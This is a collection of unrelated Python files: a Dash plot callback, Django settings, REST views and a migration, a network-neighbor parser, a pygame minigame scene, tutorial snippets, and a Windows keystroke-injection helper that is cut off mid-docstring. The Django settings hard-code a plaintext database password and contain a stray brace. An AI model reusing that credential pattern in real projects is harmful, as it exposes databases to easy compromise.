    Output("graph", "figure"),
    [Input("dropdown", "value"), Input("checklist", "value")],
)
def make_graph(dropdown_value, checklist_value):
    """Build the eruption-duration distplot for the chosen bin count and
    the optional rug/density overlays."""
    span = DATA.eruptions.max() - DATA.eruptions.min()
    fig = ff.create_distplot(
        [DATA.eruptions],
        ["Eruption duration"],
        bin_size=span / dropdown_value,
        show_curve="show_dens" in checklist_value,
        show_rug="show_ind" in checklist_value,
    )
    layout_patch = {
        "title": "Geyser eruption duration",
        "showlegend": False,
        "xaxis": {"title": "Duration (minutes)"},
        "yaxis": {"title": "Density"},
    }
    fig["layout"].update(layout_patch)
    return fig
if __name__ == "__main__":
    # Development server on port 8888; disable debug outside development.
    app.run_server(debug=True, port=8888)
|
class PriorityQueue(Queue):
    """Queue that is meant to order items by priority.

    NOTE(review): ``defaultSortFunc`` is still a stub and ``enqueue`` does a
    plain append, so no real priority ordering happens yet.
    """

    def __init__(self, list=None, _ascending=True, _sortFunc=None):
        # The parameter keeps its original (builtin-shadowing) name for
        # caller compatibility; None replaces the mutable [] default.
        super().__init__(*(list or []))
        self.ascending = _ascending
        # Bug fix: the chosen sort function was computed but never stored.
        if _sortFunc is None:
            _sortFunc = self.defaultSortFunc
        self.sortFunc = _sortFunc

    def defaultSortFunc(self):
        """Placeholder ordering hook; subclasses should override."""
        pass

    def enqueue(self, item):
        """Append *item* (priority ordering not implemented yet)."""
        self.queue.append(item)
# q = Queue(53,46,100,98,96,82,16,4,13,82)
# q.enqueue(1)
# q.enqueue(-1)
# q.dequeue()
# print(q.size)
# print(q) |
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Database presets; the settings module selects one of these as DATABASES.
SQLITE = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}
# NOTE(review): credentials are hard-coded in plain text -- consider loading
# them from environment variables instead.
POSTGRESQL = {
    'default' : {
        'ENGINE' :
        'django.db.backends.postgresql_psycopg2',
        'NAME':'Tienda',
        'USER':'postgres',
        'PASSWORD':'password',
        'HOST':'localhost',
        'PORT':'5432'
    }
}
} |
#!/usr/bin/env python3
import os
import csv
def main():
    """Parse CDP-neighbors.txt and write a node/link table to graph.csv.

    A line containing '_' starts a new device section; the lines that follow
    it are matched for aruba routers, .colgate.edu hostnames (first = local
    node, second = remote node) and switch model strings (WS/XL/XM).
    """
    # with-blocks fix two defects: the input handle was leaked and the output
    # file was never closed (so the tail could stay unflushed).
    with open("CDP-neighbors.txt", "r") as infile, \
         open("graph.csv", 'w', newline='') as masterfile:
        writer = csv.writer(masterfile)
        writer.writerow(["Node", "Connected", "Local", "Remote"])
        row = []
        remote = False
        aruba = False
        for line in infile:
            # initialize every row of the csv
            if ("_" in line):
                if (len(row) != 0):
                    writer.writerow(row)
                remote = False
                aruba = False
                row = []
            if ("aruba" in line):
                # check if it is aruba router
                row.append(line.split('-')[0].strip() + line.split('-')[1].strip())
                aruba = True
            if (aruba and ".colgate.edu" in line):
                row.append(line.split()[1])
                row.append(line.split()[0])
                row.append("none")
            if (".colgate.edu" in line and not remote and not aruba):
                row.append((line.split('.')[0]).strip())
                remote = True
            elif (".colgate.edu" in line and remote and not aruba):
                row.append((line.split('.')[0]).strip())
            if (("WS" in line or "XL" in line or "XM" in line) and not aruba):
                row.append(line.split()[0] + line.split()[1])
                row.append(line.split()[-2] + line.split()[-1])
        # Bug fix: the final section is never followed by another '_' line,
        # so its accumulated row was silently dropped; flush it here.
        if len(row) != 0:
            writer.writerow(row)
main()
|
from django.shortcuts import render
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.authtoken.models import Token
from django.shortcuts import get_object_or_404
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import generics
from Profile.models import Profile
from Profile.models import ModelCiudad
from Profile.models import ModelGenero
from Profile.models import ModelOcupacion
from Profile.models import ModelEstado
from Profile.models import ModelEstadoCivil
from Profile.serializer import ProfileSerializers
from Profile.serializer import CiudadSerializers
from Profile.serializer import GeneroSerializers
from Profile.serializer import OcupacionSerializers
from Profile.serializer import EstadoSerializers
from Profile.serializer import EstadoCivilSerializers
class ProfileList(APIView):
    """GET: list non-deleted profiles. POST: create a profile."""

    def get(self, request, format=None):
        print("Metodo get filter")
        active = Profile.objects.filter(delete=False)
        return Response(ProfileSerializers(active, many=True).data)

    def post(self, request, format=None):
        ser = ProfileSerializers(data=request.data)
        if not ser.is_valid():
            return Response(ser.errors, status=status.HTTP_400_BAD_REQUEST)
        ser.save()
        return Response(ser.data)
class CiudadList(APIView):
    """GET: list non-deleted cities. POST: create a city."""

    def get(self, request, format=None):
        print("Metodo get filter")
        active = ModelCiudad.objects.filter(delete=False)
        return Response(CiudadSerializers(active, many=True).data)

    def post(self, request, format=None):
        ser = CiudadSerializers(data=request.data)
        if not ser.is_valid():
            return Response(ser.errors, status=status.HTTP_400_BAD_REQUEST)
        ser.save()
        return Response(ser.data)
class GeneroList(APIView):
    """GET: list non-deleted genders. POST: create a gender."""

    def get(self, request, format=None):
        print("Metodo get filter")
        active = ModelGenero.objects.filter(delete=False)
        return Response(GeneroSerializers(active, many=True).data)

    def post(self, request, format=None):
        ser = GeneroSerializers(data=request.data)
        if not ser.is_valid():
            return Response(ser.errors, status=status.HTTP_400_BAD_REQUEST)
        ser.save()
        return Response(ser.data)
class OcupacionList(APIView):
    """GET: list non-deleted occupations. POST: create an occupation."""

    def get(self, request, format=None):
        print("Metodo get filter")
        active = ModelOcupacion.objects.filter(delete=False)
        return Response(OcupacionSerializers(active, many=True).data)

    def post(self, request, format=None):
        ser = OcupacionSerializers(data=request.data)
        if not ser.is_valid():
            return Response(ser.errors, status=status.HTTP_400_BAD_REQUEST)
        ser.save()
        return Response(ser.data)
class EstadoList(APIView):
    """GET: list non-deleted states. POST: create a state."""

    def get(self, request, format=None):
        print("Metodo get filter")
        active = ModelEstado.objects.filter(delete=False)
        return Response(EstadoSerializers(active, many=True).data)

    def post(self, request, format=None):
        ser = EstadoSerializers(data=request.data)
        if not ser.is_valid():
            return Response(ser.errors, status=status.HTTP_400_BAD_REQUEST)
        ser.save()
        return Response(ser.data)
class EstadoCivilList(APIView):
    """GET: list non-deleted marital statuses. POST: create one."""

    def get(self, request, format=None):
        print("Metodo get filter")
        active = ModelEstadoCivil.objects.filter(delete=False)
        return Response(EstadoCivilSerializers(active, many=True).data)

    def post(self, request, format=None):
        ser = EstadoCivilSerializers(data=request.data)
        if not ser.is_valid():
            return Response(ser.errors, status=status.HTTP_400_BAD_REQUEST)
        ser.save()
        return Response(ser.data)
# Create your views here.
|
# Generated by Django 2.2.6 on 2019-10-02 18:40
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration for qrCodeApp (do not hand-edit).

    Renames ``url_host`` -> ``key``, drops the gtin/hash/serial columns and
    adds a required ``value`` char field (one-off default '1' applied to
    existing rows).
    """
    dependencies = [
        ('qrCodeApp', '0001_initial'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='qrcodeurldata',
            options={'verbose_name': 'QR Code Base Data', 'verbose_name_plural': 'QR Code Base Data'},
        ),
        migrations.RenameField(
            model_name='qrcodeurldata',
            old_name='url_host',
            new_name='key',
        ),
        migrations.RemoveField(
            model_name='qrcodeurldata',
            name='gtin_code',
        ),
        migrations.RemoveField(
            model_name='qrcodeurldata',
            name='hash_code',
        ),
        migrations.RemoveField(
            model_name='qrcodeurldata',
            name='serial_code',
        ),
        migrations.AddField(
            model_name='qrcodeurldata',
            name='value',
            field=models.CharField(default=1, max_length=25),
            preserve_default=False,
        ),
    ]
|
#!/usr/bin/env python
import pygame
import mimo
import enum
from utils import utils
from utils import neopixelmatrix as graphics
from utils import ringpixel as ring
from utils.NeoSprite import NeoSprite, AnimatedNeoSprite, TextNeoSprite, SpriteFromFrames
from utils import constants
from scenes.BaseScene import SceneBase
from scenes.edition.FinishEventScene import FinishEventScene
# Optimization Scene
# PLAY STATUS #3
# depending on the selected material the player will have
# the opportunity to increase the impact of the transmission
# one of many possible minigames will be loaded and displayed
# to the player
# next screen will depend on player's actions
class STATUS(enum.Enum):
    # Scene lifecycle: PLAYING while the minigame timer runs,
    # FINISHING once the results popup is shown.
    FINISHING = 1
    PLAYING = 2
class OptimizationScene(SceneBase):
    """PLAY STATUS #3: timed news-optimization minigame scene.

    Subclasses supply the concrete minigame; they are expected to set
    ``self.minigametitle`` and implement ``ProcessInputOpt`` / override
    ``RenderBody`` -- TODO confirm against the subclasses.
    """

    def __init__(self):
        SceneBase.__init__(self)
        # -- initialize state --------------------------------------------------
        self.state = STATUS.PLAYING
        # countdown / current_time are in milliseconds
        self.countdown = 20000
        self.current_time = 20000
        self.popup_active = False
        self.score = 0
        self.SetupMimo()
        # -- setup layout ------------------------------------------------------
        self.SetupLayout()
        self.SetupPopup()
        #ring.fill()
        #ring.current_color = [0,0,0]

    def SetupMimo(self):
        # Fixed LED brightness for this scene.
        mimo.set_led_brightness(200)

    def SetupLayout(self):
        """Create the frame, title and timer-bar sprites."""
        self.frame = utils.Sprite(
            constants.SPRITES_OPTIMIZATION + 'optimization-frame.png',
            constants.VIEWPORT_CENTER_X,
            constants.VIEWPORT_CENTER_Y
        )
        opt_text = 'news optimization'
        if constants.language == 'es':
            opt_text = 'optimización de noticia'
        self.title = utils.Text(
            opt_text + ' - ' + self.minigametitle,
            self.subtitle_font,
            color=constants.PALETTE_TEXT_PURPLE
        )
        self.title.SetPosition(constants.VIEWPORT_CENTER_X, 40)
        # Fraction of the countdown remaining (1.0 -> full bar).
        self.timerprogress = 1.0
        self.timerBackground = utils.Sprite(
            constants.SPRITES_OPTIMIZATION+'timer_bar-background.png',
            0,
            77
        )
        self.timerBackground.setAnchor(0,0)

    def SetupPopup(self):
        """Create the results-popup sprites and labels (hidden until used)."""
        bg_image_name = 'optimization_results-popup.png'
        if constants.language == 'es':
            bg_image_name = 'optimization_finished-popup-es.png'
        self.results_background = utils.Sprite(
            constants.SPRITES_OPTIMIZATION + bg_image_name,
            640,
            360
        )
        self.popup_description = utils.Text(
            "you are awesome!",
            self.subtitle_font,
            color=constants.PALETTE_TEXT_RED
        )
        self.popup_description.SetPosition(constants.VIEWPORT_CENTER_X, 380)
        self.bonus_text = utils.Text(
            "++!",
            self.subtitle_font,
            color=constants.PALETTE_TEXT_CYAN
        )
        self.bonus_text.SetPosition(constants.VIEWPORT_CENTER_X, 420)
        next_news_text = "press to edit the next news"
        if constants.language == 'es':
            next_news_text = 'presiona para editar otra noticia'
        self.right_progress_label = utils.Text(
            next_news_text,
            self.subtitle_font,
            color = constants.PALETTE_TEXT_CYAN
        )
        self.right_progress_label.setAnchor(1, 0)
        self.right_progress_label.SetPosition(1200, 660)
        self.right_progress_icon = utils.Sprite(
            "assets/sprites/scenes/common/progress-button-green.png",
            745 if constants.language == 'en' else 684,
            642
        )
        self.right_progress_icon.setAnchor(1, 0)

    def ProcessInput(self, events, pressed_keys):
        """While finishing, wait for the 'i' key to leave the scene;
        otherwise delegate to the minigame's ProcessInputOpt."""
        if not self.IsPlaying():
            for event in events:
                if event.type == pygame.KEYDOWN and event.key == pygame.K_i:
                    self.UI_SwitchScene = utils.get_sound('assets/audio/SFX/Scanning/MG1_ObjSort.ogg')
                    self.UI_SwitchScene.play()
                    self.AddTrigger(0.16, self, 'SwitchToScene', "Edit")
                    utils.stop_music()
                    pass
            return
        self.ProcessInputOpt(events, pressed_keys)

    # in milliseconds
    @staticmethod
    def format_time(time):
        """Format ``time`` (milliseconds) as MM:SS:cc."""
        # Bug fix: was a plain method missing ``self`` (so instance calls
        # broke) and used 72000 ms per minute; a minute is 60000 ms.
        to_string = ""
        mins = time // 60000
        seconds = (time % 60000) // 1000
        cents = (time % 1000) // 10
        if mins < 10:
            to_string += "0"
        to_string += str(mins) + ":"
        if seconds < 10:
            to_string += "0"
        to_string += str(seconds) + ":"
        if cents < 10:
            to_string += "0"
        to_string += str(cents)
        return to_string

    def Update(self, dt):
        """Advance the countdown; finish the minigame when time runs out."""
        SceneBase.Update(self, dt)
        if self.IsPlaying():
            self.current_time -= int(1000 * dt)
            if self.current_time < 0:
                self.FinishOptimization()
                self.current_time = 0
            self.timerprogress = self.current_time/self.countdown
            ring.fill_percentage(self.timerprogress)
            #self.timer.SetText(OptimizationScene.format_time(self.current_time), False)

    def RenderBackground(self, screen):
        self.frame.RenderWithAlpha(screen)
        self.title.RenderWithAlpha(screen)

    def Render(self, screen):
        self.RenderBackground(screen)
        self.RenderTimer(screen)
        self.RenderBody(screen)
        if self.popup_active:
            self.RenderPopup(screen)
            return
        self.RenderCortain(screen)
        self.RenderTimeoutAlert(screen)

    def RenderBody(self, screen):
        # Bug fix: was defined without ``self``, so self.RenderBody(screen)
        # raised TypeError whenever a subclass did not override it.
        pass

    def RenderTimer(self, screen):
        self.timerBackground.RenderWithAlpha(screen)
        # Quantize the bar width into 35 steps so it shrinks in ticks.
        interval = (int(self.timerprogress*35))/35
        pygame.draw.rect(screen, [0xFF, 0x40, 0x7A], (0, 77, interval * 1280, 38))
        pygame.draw.rect(screen, [0x04, 0x00, 0x00], (0, 77, 1280, 38), 2)

    # should display the results
    # then shutdown this scene and change it to next one
    def FinishOptimization(self):
        self.state = STATUS.FINISHING
        #self.BlinkTimer()
        self.DisplayResults()
        #self.AddTrigger(3.0, self, 'SwitchToScene', FinishEventScene)

    def BlinkTimer(self):
        self.AddTween("easeInOutSine", 0.3, self.timer, "opacity", 255, 0, 0)
        self.AddTween("easeInOutSine", 0.3, self.timer, "opacity", 0, 255, 0.31)
        self.AddTrigger(0.6, self, 'BlinkTimer')

    def IsPlaying(self):
        return self.state == STATUS.PLAYING

    def DisplayResults(self):
        """Show the results popup with score-dependent texts and light up
        the hardware 'continue' button."""
        self.popup_active = True
        performance_text = ""
        bonus_text = ""
        if constants.language == 'en':
            if self.score < 0.2:
                performance_text = "Optimization Shut Down"
                bonus_text = "-10 seconds"
            elif self.score < 0.4:
                performance_text = "Sluggish Performance"
                bonus_text = "Continue The Test"
            elif self.score < 0.6:
                performance_text = "Poor Execution"
                bonus_text = "Idleness Is Fatal Only To The Mediocre"
            elif self.score < 0.8:
                performance_text = "Broadcast Reach Enhanced"
                bonus_text = "10 seconds bonus"
            else:
                performance_text = "Edition Optimized!"
                bonus_text = "20 seconds bonus"
        elif constants.language == 'es':
            if self.score < 0.2:
                performance_text = "optimización detenida"
                bonus_text = "-10 segundos"
            elif self.score < 0.4:
                performance_text = "rendimiento lento"
                bonus_text = "continuar con la prueba"
            elif self.score < 0.6:
                performance_text = "mala ejecución"
                bonus_text = "la inactividad es fatal sólo para el mediocre"
            elif self.score < 0.8:
                performance_text = "alcance de transmisión aumentado"
                bonus_text = "10 segundos de bonificación"
            else:
                performance_text = "¡noticia optimizada!"
                bonus_text = "20 segundos de bonificación"
        self.popup_description.SetText(performance_text)
        self.bonus_text.SetText(bonus_text)
        mimo.set_buttons_enable_status(True, False)
        mimo.set_material_buttons_mode([6,0])
        mimo.set_material_buttons_light([6, 0x27, 0xff, 0x93])
        mimo.set_material_buttons_active_status([6, 1])

    def RenderPopup(self, screen):
        self.results_background.RenderWithAlpha(screen)
        self.popup_description.render(screen)
        self.bonus_text.render(screen)
        self.right_progress_label.RenderWithAlpha(screen)
        self.right_progress_icon.RenderWithAlpha(screen)
|
import numpy as np
import lasagne
from braindecode.experiments.experiment import create_experiment
def load_model(basename):
    """Rebuild the model described by ``<basename>.yaml`` and restore the
    parameter values stored in ``<basename>.npy``."""
    experiment = create_experiment(basename + '.yaml')
    network = experiment.final_layer
    saved_params = np.load(basename + '.npy')
    set_param_values_backwards_compatible(network, saved_params)
    return network
def load_exp_and_model(basename, set_invalid_to_NaN=True, seed=9859295):
    """Load experiment and model for analysis; optionally set invalid fill
    values to NaN."""
    model = load_model(basename)
    exp = create_experiment(basename + '.yaml', seed=seed)
    if set_invalid_to_NaN:
        # Mark invalid positions with NaN so later transformations (to cnt
        # and time activations) can be verified for correctness.
        for layer in lasagne.layers.get_all_layers(model):
            if hasattr(layer, 'invalid_fill_value'):
                layer.invalid_fill_value = np.nan
    return exp, model
def set_param_values_backwards_compatible(final_layer, param_values):
    """Backwards compatible for old batch norm layer params.

    Copies ``param_values`` into the network behind ``final_layer``. Params
    saved by an old batch-norm implementation were stored as (1, C, 1, 1)
    tensors with mean/std and beta/gamma swapped; they are squeezed to (C,)
    here and swapped back in the second pass below.
    """
    old_batch_norm_layer_used = False
    for param, param_val in zip(lasagne.layers.get_all_params(final_layer), param_values):
        if param.get_value().shape == param_val.shape:
            # Shapes agree: plain copy.
            param.set_value(param_val)
        # account for change in batch norm layer
        elif param.get_value().ndim == 1 and param_val.ndim == 4:
            old_batch_norm_layer_used = True
            assert param.get_value().shape[0] == param_val.shape[1]
            if param.name == 'inv_std':  # was std before, now inv std
                # assuming epsilon was always 1e-4 :)
                #epsilon = 1e-4
                #param_val = 1.0 / (param_val + epsilon)
                pass
            else:
                assert param.name in ['mean', 'beta', 'gamma'], (
                    "Unexpected param name {:s}".format(
                        param.name))
            # Squeeze the old (1, C, 1, 1) layout down to (C,); the raw
            # values are corrected in the batch-norm pass below.
            param.set_value(param_val[0,:,0,0])
        else:
            raise ValueError("Different shapes for parameters, constructed model:"
                "{:s}, param value: {:s}".format(
                    str(param.get_value().shape), str(param_val.shape)))
    for l in lasagne.layers.get_all_layers(final_layer):
        if (l.__class__.__name__ == 'BatchNormLayer' and
                old_batch_norm_layer_used):
            # The old layer stored (beta, gamma) where the new one stores
            # (mean, inv_std) and vice versa -- swap them back and convert
            # gamma (old std) into an inverse std.
            print("Correcting for old batch norm layer")
            false_mean = l.mean.get_value()
            false_inv_std = l.inv_std.get_value()
            false_beta = l.beta.get_value()
            false_gamma = l.gamma.get_value()
            l.mean.set_value(false_beta)
            l.inv_std.set_value(1.0 / (false_gamma + l.epsilon))
            l.beta.set_value(false_mean)
            l.gamma.set_value(false_inv_std)
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# ------------------------------------------------------------------
# -------------------- 实现switch类似功能 --------------------
# ------------------------------------------------------------------
# Example 1: a dict lookup acting as a switch statement.
choice = 'ham'
print({'spam': 1, 'ham': 1.99, 'eggs': 3, 'bacon': 1.1}[choice])
# Equivalent if/elif chain:
if choice == 'spam':
    print(1)
elif choice == 'ham':
    print(1.99)
elif choice == 'eggs':
    print(3)
elif choice == 'bacon':  # bug fix: was 'bacom', which could never match
    print(1.1)
else:
    print('Error')
# 实例2,加减乘除的实现1
def add(num1, num2):
    """Return the sum of the two operands."""
    result = num1 + num2
    return result
def sub(num1, num2):
    """Return the difference of the two operands."""
    result = num1 - num2
    return result
def mul(num1, num2):
    """Return the product of the two operands."""
    result = num1 * num2
    return result
def div(num1, num2):
    """Return the (true-division) quotient of the two operands."""
    result = num1 / num2
    return result
# Dispatch table: map operator symbols to the callables defined above.
operator = {'+': add, '-': sub, '*': mul, '/': div}
res = operator['+'](1, 2)  # look up '+' and call add(1, 2)
print(res)
# 实例3,加减乘除的实现2
def adde():
    """Add the module-level globals ``a`` and ``b``."""
    total = a + b
    return total
def sube():
    """Subtract the module-level global ``b`` from ``a``."""
    difference = a - b
    return difference
def mule():
    """Multiply the module-level globals ``a`` and ``b``."""
    product = a * b
    return product
def dive():
    """True-divide the module-level global ``a`` by ``b``."""
    quotient = a / b
    return quotient
a = 5
b = 7
# NOTE: the dict values *call* the functions immediately, so this table
# stores the four results, not the callables (contrast with example 2).
operator = {'+': adde(), '-': sube(), '*': mule(), '/': dive()}
res = operator['*']
print(res)
# For more usage see "V - functions\switch statement implementation.py"
print("更多用法,请看'V - 函数\\switch语句的实现.py'")
# ------------------------------------------------------------------
# ----------------------- General form of if -----------------------
# ------------------------------------------------------------------
# if <test1>:
#     <statement1>
# elif <test2>:
#     <statement2>
# else:
#     <statement3>
# ------------------------------------------------------------------
# -------------------- Ternary (conditional) if --------------------
# ------------------------------------------------------------------
# A = X if Y else Z
b = 'spams'
# b is 'spams' (not 'spam'), so the else branch yields 'test'.
a = 'temp' if b == 'spam' else 'test'
print(a)
|
# 2017-03-11 jkang
# practice tf.cond
# ref: http://web.stanford.edu/class/cs20si
import tensorflow as tf
x = tf.random_uniform([], -1, 1)  # random scalar in [-1, 1)
y = tf.random_uniform([], -1, 1)  # random scalar in [-1, 1)
# Bug fix: tf.sub was removed in TF 1.0; tf.subtract is the replacement.
out = tf.cond(tf.less(x, y), lambda: tf.add(x, y), lambda: tf.subtract(x, y))
'''
if 1st arg of tf.cond is TRUE:
    tf.add(x,y) is run
if 1st arg of tf.cond is FALSE:
    tf.subtract(x,y) is run
'''
sess = tf.InteractiveSession()
# NOTE(review): each sess.run re-samples x and y, so the printed boolean and
# the printed value come from different draws.
print(sess.run(tf.less(x, y)))
print(sess.run(out))
sess.close()
|
# Code by Daniel Kukiela (https://twitter.com/daniel_kukiela)
# Originally acquired from the repository by sentdex (https://github.com/Sentdex/pygta5)
import ctypes
from threading import Thread
from time import time, sleep
from queue import Queue
# main keys class
class Keys(object):
    """Synthesize keyboard and mouse input on Windows via the user32 ``SendInput`` API.

    The actual ``ctypes`` calls are delegated to a :class:`KeysWorker`. An
    optional ``common`` object providing an ``info()`` method can be passed
    for logging; without one the instance runs standalone (no logging).
    """

    common = None
    standalone = False
    # worker instance and the thread currently draining its queue
    keys_worker = None
    keys_process = None
    # key event flags, OR-ed together for SendInput (see Win32 KEYBDINPUT
    # dwFlags; direct_keys presumably maps to KEYEVENTF_SCANCODE — confirm)
    direct_keys = 0x0008
    virtual_keys = 0x0000
    key_press = 0x0000
    key_release = 0x0002
    # mouse event flags (see Win32 MOUSEINPUT dwFlags)
    mouse_move = 0x0001
    mouse_lb_press = 0x0002
    mouse_lb_release = 0x0004
    mouse_rb_press = 0x0008
    mouse_rb_release = 0x0010
    mouse_mb_press = 0x0020
    mouse_mb_release = 0x0040
    # direct (scan code) keys
    dk = {
        "1": 0x02,
        "2": 0x03,
        "3": 0x04,
        "4": 0x05,
        "5": 0x06,
        "6": 0x07,
        "7": 0x08,
        "8": 0x09,
        "9": 0x0A,
        "0": 0x0B,
        "NUMPAD1": 0x4F, "NP1": 0x4F,
        "NUMPAD2": 0x50, "NP2": 0x50,
        "NUMPAD3": 0x51, "NP3": 0x51,
        "NUMPAD4": 0x4B, "NP4": 0x4B,
        "NUMPAD5": 0x4C, "NP5": 0x4C,
        "NUMPAD6": 0x4D, "NP6": 0x4D,
        "NUMPAD7": 0x47, "NP7": 0x47,
        "NUMPAD8": 0x48, "NP8": 0x48,
        "NUMPAD9": 0x49, "NP9": 0x49,
        "NUMPAD0": 0x52, "NP0": 0x52,
        "DIVIDE": 0xB5, "NPDV": 0xB5,
        "MULTIPLY": 0x37, "NPM": 0x37,
        # "SUBTRACT" added as a correctly spelled alias; the historical
        # "SUBSTRACT" spelling is kept for backward compatibility.
        "SUBSTRACT": 0x4A, "SUBTRACT": 0x4A, "NPS": 0x4A,
        "ADD": 0x4E, "NPA": 0x4E,
        "DECIMAL": 0x53, "NPDC": 0x53,
        "NUMPADENTER": 0x9C, "NPE": 0x9C,
        "A": 0x1E,
        "B": 0x30,
        "C": 0x2E,
        "D": 0x20,
        "E": 0x12,
        "F": 0x21,
        "G": 0x22,
        "H": 0x23,
        "I": 0x17,
        "J": 0x24,
        "K": 0x25,
        "L": 0x26,
        "M": 0x32,
        "N": 0x31,
        "O": 0x18,
        "P": 0x19,
        "Q": 0x10,
        "R": 0x13,
        "S": 0x1F,
        "T": 0x14,
        "U": 0x16,
        "V": 0x2F,
        "W": 0x11,
        "X": 0x2D,
        "Y": 0x15,
        "Z": 0x2C,
        "F1": 0x3B,
        "F2": 0x3C,
        "F3": 0x3D,
        "F4": 0x3E,
        "F5": 0x3F,
        "F6": 0x40,
        "F7": 0x41,
        "F8": 0x42,
        "F9": 0x43,
        "F10": 0x44,
        "F11": 0x57,
        "F12": 0x58,
        "UP": 0xC8,
        "LEFT": 0xCB,
        "RIGHT": 0xCD,
        "DOWN": 0xD0,
        "ESC": 0x01,
        "SPACE": 0x39, "SPC": 0x39,
        "RETURN": 0x1C, "ENT": 0x1C,
        "INSERT": 0xD2, "INS": 0xD2,
        "DELETE": 0xD3, "DEL": 0xD3,
        "HOME": 0xC7,
        "END": 0xCF,
        "PRIOR": 0xC9, "PGUP": 0xC9,
        "NEXT": 0xD1, "PGDN": 0xD1,
        "BACK": 0x0E,
        "TAB": 0x0F,
        "LCONTROL": 0x1D, "LCTRL": 0x1D,
        "RCONTROL": 0x9D, "RCTRL": 0x9D,
        "LSHIFT": 0x2A, "LSH": 0x2A,
        "RSHIFT": 0x36, "RSH": 0x36,
        "LMENU": 0x38, "LALT": 0x38,
        "RMENU": 0xB8, "RALT": 0xB8,
        "LWIN": 0xDB,
        "RWIN": 0xDC,
        "APPS": 0xDD,
        "CAPITAL": 0x3A, "CAPS": 0x3A,
        "NUMLOCK": 0x45, "NUM": 0x45,
        "SCROLL": 0x46, "SCR": 0x46,
        "MINUS": 0x0C, "MIN": 0x0C,
        "LBRACKET": 0x1A, "LBR": 0x1A,
        "RBRACKET": 0x1B, "RBR": 0x1B,
        "SEMICOLON": 0x27, "SEM": 0x27,
        "APOSTROPHE": 0x28, "APO": 0x28,
        "GRAVE": 0x29, "GRA": 0x29,
        "BACKSLASH": 0x2B, "BSL": 0x2B,
        "COMMA": 0x33, "COM": 0x33,
        "PERIOD": 0x34, "PER": 0x34,
        "SLASH": 0x35, "SLA": 0x35,
    }
    # virtual keys
    vk = {
        "1": 0x31,
        "2": 0x32,
        "3": 0x33,
        "4": 0x34,
        "5": 0x35,
        "6": 0x36,
        "7": 0x37,
        "8": 0x38,
        "9": 0x39,
        "0": 0x30,
        "NUMPAD1": 0x61, "NP1": 0x61,
        "NUMPAD2": 0x62, "NP2": 0x62,
        "NUMPAD3": 0x63, "NP3": 0x63,
        "NUMPAD4": 0x64, "NP4": 0x64,
        "NUMPAD5": 0x65, "NP5": 0x65,
        "NUMPAD6": 0x66, "NP6": 0x66,
        "NUMPAD7": 0x67, "NP7": 0x67,
        "NUMPAD8": 0x68, "NP8": 0x68,
        "NUMPAD9": 0x69, "NP9": 0x69,
        "NUMPAD0": 0x60, "NP0": 0x60,
        "DIVIDE": 0x6F, "NPDV": 0x6F,
        "MULTIPLY": 0x6A, "NPM": 0x6A,
        # "SUBTRACT" alias as above.
        "SUBSTRACT": 0x6D, "SUBTRACT": 0x6D, "NPS": 0x6D,
        "ADD": 0x6B, "NPA": 0x6B,
        "DECIMAL": 0x6E, "NPDC": 0x6E,
        "NUMPADENTER": 0x0D, "NPE": 0x0D,
        "A": 0x41,
        "B": 0x42,
        "C": 0x43,
        "D": 0x44,
        "E": 0x45,
        "F": 0x46,
        "G": 0x47,
        "H": 0x48,
        "I": 0x49,
        "J": 0x4A,
        "K": 0x4B,
        "L": 0x4C,
        "M": 0x4D,
        "N": 0x4E,
        "O": 0x4F,
        "P": 0x50,
        "Q": 0x51,
        "R": 0x52,
        "S": 0x53,
        "T": 0x54,
        "U": 0x55,
        "V": 0x56,
        "W": 0x57,
        "X": 0x58,
        "Y": 0x59,
        "Z": 0x5A,
        "F1": 0x70,
        "F2": 0x71,
        "F3": 0x72,
        "F4": 0x73,
        "F5": 0x74,
        "F6": 0x75,
        "F7": 0x76,
        "F8": 0x77,
        "F9": 0x78,
        "F10": 0x79,
        "F11": 0x7A,
        "F12": 0x7B,
        "UP": 0x26,
        "LEFT": 0x25,
        "RIGHT": 0x27,
        "DOWN": 0x28,
        "ESC": 0x1B,
        "SPACE": 0x20, "SPC": 0x20,
        "RETURN": 0x0D, "ENT": 0x0D,
        "INSERT": 0x2D, "INS": 0x2D,
        "DELETE": 0x2E, "DEL": 0x2E,
        "HOME": 0x24,
        "END": 0x23,
        "PRIOR": 0x21, "PGUP": 0x21,
        "NEXT": 0x22, "PGDN": 0x22,
        "BACK": 0x08,
        "TAB": 0x09,
        "LCONTROL": 0xA2, "LCTRL": 0xA2,
        "RCONTROL": 0xA3, "RCTRL": 0xA3,
        "LSHIFT": 0xA0, "LSH": 0xA0,
        "RSHIFT": 0xA1, "RSH": 0xA1,
        "LMENU": 0xA4, "LALT": 0xA4,
        "RMENU": 0xA5, "RALT": 0xA5,
        "LWIN": 0x5B,
        "RWIN": 0x5C,
        "APPS": 0x5D,
        "CAPITAL": 0x14, "CAPS": 0x14,
        "NUMLOCK": 0x90, "NUM": 0x90,
        "SCROLL": 0x91, "SCR": 0x91,
        "MINUS": 0xBD, "MIN": 0xBD,
        "LBRACKET": 0xDB, "LBR": 0xDB,
        "RBRACKET": 0xDD, "RBR": 0xDD,
        "SEMICOLON": 0xBA, "SEM": 0xBA,
        "APOSTROPHE": 0xDE, "APO": 0xDE,
        "GRAVE": 0xC0, "GRA": 0xC0,
        "BACKSLASH": 0xDC, "BSL": 0xDC,
        "COMMA": 0xBC, "COM": 0xBC,
        "PERIOD": 0xBE, "PER": 0xBE,
        "SLASH": 0xBF, "SLA": 0xBF,
    }

    # setup object
    def __init__(self, common = None):
        """Create the worker; ``common`` is an optional logger-like object."""
        self.keys_worker = KeysWorker(self)
        # Thread(target=self.keys_worker.processQueue).start()
        self.common = common
        if common is None:
            self.standalone = True

    # parses keys string and adds keys to the queue
    def parseKeyString(self, string):
        """Parse a comma-separated key string and queue it for threaded sending.

        Supported tokens: key names (see ``dk``/``vk``), "VK"/"DK" to switch
        code tables, "0x.." raw key codes, "-N" pauses in milliseconds, and
        "_UP"/"_DOWN" suffixes to send only one half of a keystroke.

        Returns True when everything was queued, or the list of invalid
